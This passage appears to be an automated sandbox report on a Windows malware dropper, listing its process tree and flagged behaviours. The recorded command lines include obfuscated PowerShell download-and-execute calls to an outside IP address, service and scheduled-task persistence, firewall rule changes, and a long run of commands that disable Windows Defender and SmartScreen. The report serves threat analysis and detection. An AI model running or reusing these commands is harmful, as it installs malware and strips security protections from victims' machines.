3832 sotema_4.exe jfiag3g_gg.exe PID 484 wrote to memory of 3608 484 sotema_1.exe rUNdlL32.eXe PID 484 wrote to memory of 3608 484 sotema_1.exe rUNdlL32.eXe PID 484 wrote to memory of 3608 484 sotema_1.exe rUNdlL32.eXe PID 3064 wrote to memory of 1568 3064 sotema_7.exe sotema_7.exe PID 3064 wrote to memory of 1568 3064 sotema_7.exe sotema_7.exe PID 3064 wrote to memory of 1568 3064 sotema_7.exe sotema_7.exe PID 3832 wrote to memory of 1904 3832 sotema_4.exe jfiag3g_gg.exe PID 3832 wrote to memory of 1904 3832 sotema_4.exe jfiag3g_gg.exe PID 3832 wrote to memory of 1904 3832 sotema_4.exe jfiag3g_gg.exe PID 3064 wrote to memory of 3952 3064 sotema_7.exe sotema_7.exe PID 3064 wrote to memory of 3952 3064 sotema_7.exe sotema_7.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 5420 attrib.exe 5844 attrib.exe 5124 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe"C:\Users\Admin\AppData\Local\Temp\b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sotema_1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_1.exesotema_1.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 6047⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sotema_7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exesotema_7.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exeC:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exeC:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exeC:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exeC:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_7.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sotema_6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_6.exesotema_6.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Documents\3yMtczVXNtqMP89LIvk7QYbS.exe"C:\Users\Admin\Documents\3yMtczVXNtqMP89LIvk7QYbS.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 12047⤵
- Program crash
-
C:\Users\Admin\Documents\aZNvbi1qOlM2iXjLOIdGOTe7.exe"C:\Users\Admin\Documents\aZNvbi1qOlM2iXjLOIdGOTe7.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RegSvc.exe"C:\Users\Admin\AppData\Local\Temp\RegSvc.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\Documents\RaRBFtrTBYU1Y0tjpmree9bR.exe"C:\Users\Admin\Documents\RaRBFtrTBYU1Y0tjpmree9bR.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2a6bacde-3795-4e9f-bf7b-f95052cca579.exe"C:\Users\Admin\AppData\Local\Temp\2a6bacde-3795-4e9f-bf7b-f95052cca579.exe"7⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Users\Admin\Documents\plrFbDYtIxqeEfatjuv652pe.exe"C:\Users\Admin\Documents\plrFbDYtIxqeEfatjuv652pe.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Users\Admin\Documents\ciTtNor6DDyzdbtHN54ouYOI.exe"C:\Users\Admin\Documents\ciTtNor6DDyzdbtHN54ouYOI.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"9⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"9⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pifAccostarmi.exe.pif N9⤵
-
C:\Users\Admin\Documents\NZ3wDc8ii26yAtWGtved6YIF.exe"C:\Users\Admin\Documents\NZ3wDc8ii26yAtWGtved6YIF.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\NZ3wDc8ii26yAtWGtved6YIF.exe7⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 08⤵
-
C:\Users\Admin\Documents\RvDZTDbVe8cu7cHeyBtfVhCf.exe"C:\Users\Admin\Documents\RvDZTDbVe8cu7cHeyBtfVhCf.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\55FM6.exe"C:\Users\Admin\AppData\Local\Temp\55FM6.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BJ4F6.exe"C:\Users\Admin\AppData\Local\Temp\BJ4F6.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\H9LM9.exe"C:\Users\Admin\AppData\Local\Temp\H9LM9.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\F1BG9.exe"C:\Users\Admin\AppData\Local\Temp\F1BG9.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\M7AEC13I8KEH8BD.exehttps://iplogger.org/1nChi77⤵
-
C:\Users\Admin\AppData\Local\Temp\A23L2.exe"C:\Users\Admin\AppData\Local\Temp\A23L2.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -S .\b0EiM8L.W -U8⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\fkozqZVOJK8nYg3uy3BmTTkU.exe"C:\Users\Admin\Documents\fkozqZVOJK8nYg3uy3BmTTkU.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSD280.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\xQJudsUslbRDEyOqmqKmWsYK.exe"C:\Users\Admin\Documents\xQJudsUslbRDEyOqmqKmWsYK.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 3447⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 3447⤵
- Program crash
-
C:\Users\Admin\Documents\74CIU7hguX3Rep8AcBT0owXq.exe"C:\Users\Admin\Documents\74CIU7hguX3Rep8AcBT0owXq.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 4327⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 4407⤵
- Program crash
-
C:\Users\Admin\Documents\UBGIMlfT_24VXrYTNn4S0uSp.exe"C:\Users\Admin\Documents\UBGIMlfT_24VXrYTNn4S0uSp.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"7⤵
-
C:\Windows\system32\mode.commode 65,108⤵
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e file.zip -p320791618516055 -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_9.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_8.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_7.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_6.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_5.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_4.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_3.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_2.zip -oextracted8⤵
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_1.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\attrib.exeattrib +H "Result_protected.exe"8⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\123\Result_protected.exe"Result_protected.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"9⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\222.exe"C:\Users\Admin\AppData\Local\Temp\222.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\CyPSXzY1M1Ivhbr6JmTc7SY5.exe"C:\Users\Admin\Documents\CyPSXzY1M1Ivhbr6JmTc7SY5.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 6247⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 6607⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 6327⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 7287⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 8407⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 12687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 12407⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "CyPSXzY1M1Ivhbr6JmTc7SY5.exe" /f & erase "C:\Users\Admin\Documents\CyPSXzY1M1Ivhbr6JmTc7SY5.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "CyPSXzY1M1Ivhbr6JmTc7SY5.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 11287⤵
- Program crash
-
C:\Users\Admin\Documents\mSHXhzqCbB4jwXEZq1ycglga.exe"C:\Users\Admin\Documents\mSHXhzqCbB4jwXEZq1ycglga.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bsxnalar\7⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create bsxnalar binPath= "C:\Windows\SysWOW64\bsxnalar\nflmumnc.exe /d\"C:\Users\Admin\Documents\mSHXhzqCbB4jwXEZq1ycglga.exe\"" type= own start= auto DisplayName= "wifi support"7⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description bsxnalar "wifi internet conection"7⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start bsxnalar7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nflmumnc.exe" C:\Windows\SysWOW64\bsxnalar\7⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul7⤵
-
C:\Users\Admin\bpqsuzmp.exe"C:\Users\Admin\bpqsuzmp.exe" /d"C:\Users\Admin\Documents\mSHXhzqCbB4jwXEZq1ycglga.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cqrtvanq.exe" C:\Windows\SysWOW64\bsxnalar\8⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config bsxnalar binPath= "C:\Windows\SysWOW64\bsxnalar\cqrtvanq.exe /d\"C:\Users\Admin\bpqsuzmp.exe\""8⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start bsxnalar8⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4882.bat" "8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 13088⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 11567⤵
- Program crash
-
C:\Users\Admin\Documents\VZ7NTurPKHOFfMK1BrDT_Vg7.exe"C:\Users\Admin\Documents\VZ7NTurPKHOFfMK1BrDT_Vg7.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#617⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 10007⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 10087⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 10447⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 10527⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 10087⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 10487⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 10807⤵
- Program crash
-
C:\Users\Admin\Documents\IF3sualFSZNKp2Oo3vzXX3_r.exe"C:\Users\Admin\Documents\IF3sualFSZNKp2Oo3vzXX3_r.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\V3ujjI6J5Cgn10sQZ2ltQJBx.exe"C:\Users\Admin\Documents\V3ujjI6J5Cgn10sQZ2ltQJBx.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX7⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 4889⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX7⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive8⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive9⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c attrib +s +h C:\ProgramData\OneDrive8⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\ProgramData\OneDrive9⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -exec bypass start-process C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs8⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs"9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\OneDrive\Offer.bat" "10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Users\Admin\AppData\Roaming\OneDrive\Offer.exeOffer.exe11⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 411⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f11⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f11⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\System32\smartscreen.exe" /a11⤵
- Executes dropped EXE
- Possible privilege escalation attempt
- Loads dropped DLL
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\System32\smartscreen.exe" /grant:r Administrators:F /c11⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im smartscreen.exe /f11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefreshTask" /Disable11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable11⤵
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend11⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdNisDrv11⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdNisSvc11⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdFilter11⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdBoot11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 211⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\OneDrive\Power.exePower.exe Regedit.exe /S Offer.reg11⤵
-
C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe"C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" Regedit.exe /S Offer.reg12⤵
-
